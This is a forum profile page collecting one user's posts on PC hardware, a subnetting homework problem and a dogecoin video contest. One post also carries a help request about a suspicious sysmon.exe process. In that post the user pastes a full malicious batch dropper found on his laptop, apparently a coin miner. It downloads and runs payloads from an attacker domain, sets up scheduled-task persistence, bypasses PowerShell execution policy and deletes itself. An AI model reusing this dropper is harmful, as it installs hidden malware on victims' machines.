About ciprian97pop

  • Birthday: 1997-07-29
  • Interests: Gaming, OC-ing, Everything tech-related

2,702 profile views
  1. I... I really don't know. It's more embarrassing as I work as a system administrator and I should be the one stopping things like this from happening. If I think a bit, I might have gotten this a few days earlier when I did some data recovery for a company. They had a few bad drives that weren't recognized in Windows so I used TestDisk to recover some files. Maybe that was the moment in which I got that
  2. Yep. Malwarebytes got rid of it. I will keep doing some daily scans until next week just to be sure.
  3. Hi again. So... yeah.. Today I installed Malwarebytes and let's just say that that wasn't a Windows event reporter. Again, thank you guys for your involvement.
  4. Thank you guys for your replies. I will stop killing the process and let it run, hoping it will disappear soon. Just hoping that I won't have the surprise of turning on my laptop tomorrow morning and finding everything encrypted. P.S.: Making a backup on Google Drive with my most important files just to be safe.
  5. Are you sure? Why would it need to consume that much CPU if it's just some event monitor? I also read that article but didn't think much of it.
  6. Hello everyone. Today I noticed a weird process showing up in Task Manager that's constantly consuming 45-50% of my CPU all the time. The process is called sysmon.exe and I've been aware of it for a few hours. Every time I kill the process it comes back. It also creates the .exe in the appdata/temp folder. I've searched online but I didn't find almost anything about it. Also, I'm in the process of downloading an antivirus (used Windows Defender because I don't download or use suspicious stuff). I also thought that it might be some sort of coin miner but it wasn't using any internet.

     Here's a screenshot of it:

     Also, here's the path to the file

     UPDATE: After some more digging, I found out that every time, it creates a temp_XXXX folder (where XXXX are random numbers) and in that folder it also creates 3 .bat files. The start.bat file is just running the build.bat file, but here's what I found when I opened the build.bat file.

     At this point I'm 99% sure that this is some kind of coin miner/malware. Here comes the fun part. This is what I found when I opened the upd.bat file:

     <spoiler>
     ping www.google.com -n 1 -w 1000
     if %errorlevel% == 1 (
         exit
     )
     if not exist "%TEMP%\7za.exe" (
         PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31f g1x2. org/7za.exe -OutFile \"%TEMP%\7za.exe\""
     )
     if not exist "%TEMP%\ppuarchive4.zip" (
         PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31 fg1x2. org/packagenew_unsigned.zip -OutFile \"%TEMP%\ppuarchive4.zip\""
     )
     if not exist "%TEMP%\bcmuarchive12.zip" (
         PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31f g1x2. org/packagehwloc_unsigned.zip -OutFile \"%TEMP%\bcmuarchive12.zip\""
     )
     if not exist "%TEMP%\tmg.ps1" (
         PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31f g1x2. o rg/trackermagic.ps1 -OutFile \"%TEMP%\tmg.ps1\""
     )
     if not exist "%TEMP%\opokl.txt" (
         PowerShell -NoLogo -Command "Invoke-WebRequest -Uri http://31b4bd 31fg1x2 .o rg/svchostc_task.xml -OutFile \"%TEMP%\svctask.xml\""
         PowerShell -NoLogo -Command "(gc \"%TEMP%\svctask.xml\") -replace 'LOCALAPPDATA', '%LOCALAPPDATA%' | Out-File \"%TEMP%\svctask.xml\""
         schtasks /Create /xml "%TEMP%\svctask.xml" /tn "svchostc" /F
         del "%TEMP%\svctask.xml"
         echo a > "%TEMP%\opokl.txt"
     )
     if not exist "%LOCALAPPDATA%\WindowsDefenderTemp\update.vbs" (
         PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31f g1x2. o rg/batch bot.vbs -OutFile \"%TEMP%\batchbot.vbs\""
         PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31fg 1x2.or g/batchinstaller.bat -OutFile \"%TEMP%\batchinstaller.bat\""
         PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd 31fg1x2.o rg/batchtask.xml -OutFile \"%TEMP%\batchtask.xml\""
         "%TEMP%\batchinstaller.bat"
     )
     set list=FDBBBAD251AD958202EBB8D72746CEDC85DA45F2 8763B0C12D08BF29E40929B97A05D89721F8387D 4F4BA35DCA24DFA59E3CAADEA01C1094A1D0DB9F 39999E1648D457EC986B80CA2319C3B3E6B6C26B D0011BD12AA2D97084AC8D9E08FAA4C7307D616C EEFD9416DF1F743F26CD0B695C437626D951D752 FA58AD3904381B2E35CD233CD3DEFB13DB83FDC7 92B60DF728B47048D8354AB9C96ADCD60B25B01A 77E386B5AB1046DD872394DED2C93B312B93EAD1
     (for %%a in (%list%) do (
         powershell -NoLogo -ExecutionPolicy Bypass -File "%TEMP%\tmg.ps1" tracker.leechers-paradise.org 6969 %%a 90
         powershell -NoLogo -ExecutionPolicy Bypass -File "%TEMP%\tmg.ps1" tracker.coppersurfer.tk 6969 %%a 90
         powershell -NoLogo -ExecutionPolicy Bypass -File "%TEMP%\tmg.ps1" exodus.desync.com 6969 %%a 90
     ))
     powercfg /SETACVALUEINDEX SCHEME_CURRENT 0012ee47-9041-4b5d-9b77-535fba8b1442 6738e2c4-e8a5-4a42-b16a-e040e769756e 0
     powercfg /SETDCVALUEINDEX SCHEME_CURRENT 0012ee47-9041-4b5d-9b77-535fba8b1442 6738e2c4-e8a5-4a42-b16a-e040e769756e 0
     powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 29f6c1db-86da-48c5-9fdb-f2b67b1f44da 0
     powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 29f6c1db-86da-48c5-9fdb-f2b67b1f44da 0
     powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 9d7815a6-7ee4-497e-8888-515a05f02364 0
     powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 9d7815a6-7ee4-497e-8888-515a05f02364 0
     powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1
     powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1
     reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\GraphicsDrivers" /v TdrDelay /t REG_SZ /d "8" /f
     if not exist "%LOCALAPPDATA%\svc10.17134\d.txt" (
         "%TEMP%\7za.exe" x "%TEMP%\ppuarchive4.zip" -o"%~dp0" -y
         "%~dp0\packagenew\buildpassive.bat"
         echo d > "%LOCALAPPDATA%\svc10.17134\d.txt"
         rmdir /s /q "%~dp0\packagenew"
     )
     taskkill /f /im sysmon.exe
     ::tasklist /FI "IMAGENAME eq sysmon.exe" 2>NUL | find /I /N "sysmon.exe">NUL
     ::if "%ERRORLEVEL%"=="0" exit
     "%TEMP%\7za.exe" x "%TEMP%\bcmuarchive12.zip" -o"%~dp0" -y
     "%~dp0\packagehwloc\start.bat"
     start /b "" cmd /c del "%~dp0\upd.bat"&exit /b
     </spoiler>

     Yeah, so it surely is a virus or some sort of malware. Could someone explain to me what that code does? It would help a lot. Also, any suggestions would be greatly appreciated. Thank you
  7. Link to the contest: https://www.reddit.com/r/dogecoin/comments/7kvpy7/video_contest_18_million_doge_to_celebrate_2018/ So basically the guys over on the dogecoin reddit page are organising a contest celebrating that the year 2018 will be the year of the dog. To enter the contest you have to create a short and fun video regarding dogecoin and that's it. The craziest part is that right now, 18.000.000 dogecoins are worth about $144.000. Also, today dogecoin has reached an all time high of $0.008768. P.S.: I am making this topic just to get more people to participate. I am not affiliated in any shape or form with the guys over there and I gain nothing from making this topic, I just wanna make more people aware of this contest, and if this violates the rules I'm sorry and I will support all the consequences.
  8. Thank you for all the links and all the help from the previous post. It would be logical to create different subnets for different parts of the network and for different building stories, but thankfully the assignment doesn't have to be that complex. Yeah, it could be, but the extra points that I would be getting for doing that aren't worth the effort because the assignment also has an economical part which includes things like the cost of the whole operation, amortization of equipment and many others. This was just a part of it. Thank you again for everyone's help.
  9. My bad, by the last address I was thinking of x.x.x.254 and by first of x.x.x.1. In the router config I have a few tabs. The first tab is LAN, in which I have the router's IP address( the second tab is Internet, in which I have these boxes (see the screenshot below). It's named wi fi free because I've got the same router set as the free Wi-Fi part of the network. If I set the default gateway like this, to the last address, and the IP address as being the first one, on the PCs which should I put as the default gateway, the one with 254 at the end? Edit: in the screenshot the DG is .2.254 but I've changed it to .3.254.
  10. Got it. I've set the default gateway to the subnet mask auto-filled to but I was able to change it this time without a problem to and I started giving IP addresses to PCs from (because I gave to the main router) and now it works. Thank you for your help. P.S.: Should the default gateway be the last IP address of the interval like I've set it to be? It's a question that I keep asking myself.
  11. This ^ Get the 1400 and spend the extra money on a 470/570/480/580 and then maybe try to save up for a CPU cooler for OC. Edit: if you already have the 1050ti bought, still get the 1400 and invest the money in something else like a CPU cooler.
  12. The CPU has nothing to do with the chipset of the board as long as it's an AM4 board.
  13. Whichever one is the cheapest. You don't have a big budget and the speed difference between those drives is at max 20-30 mb/s, a difference which you won't notice.
  14. Hey everyone, I have an assignment to make for my networking class but I'm stuck on something. I have to make a computer network for a business with 950 hosts. I've thought to make it an IT company that has the following structure: 600 hosts for the IT and programming department (500 hosts for desktops and a private Wi-Fi network for 100 laptops), 200 hosts for the marketing and HR department and another 150 hosts for public free Wi-Fi. The first step is to calculate the subnet mask, right? That's what I did. My subnet mask is (because 2^9 is 512 which is not enough and 2^10 is 1024). Now here comes my question. I know that I can use 1024 IPs, which is more than enough for me, but what interval of IPs can I use? At first I thought that I can use any kind of private IPs (like 10.x.x.x or 177.(21-32).x.x or 192.168.x.x) but if I put in Cisco Packet Tracer (the program in which I have to exemplify the network) as an IP for a PC, it changes my subnet mask to's what I remember changing it to). If I set the subnet mask first to and then enter an IP it gives me an error and I cannot continue. Can you please tell me what I am doing wrong? And what is the IP interval that I can use? Thank you
  15. Somehow maybe the ROM was the problem. I tried copying another ROM with the same method mentioned above, renamed it and I was able to install it without any problems. Thank you very much for your help.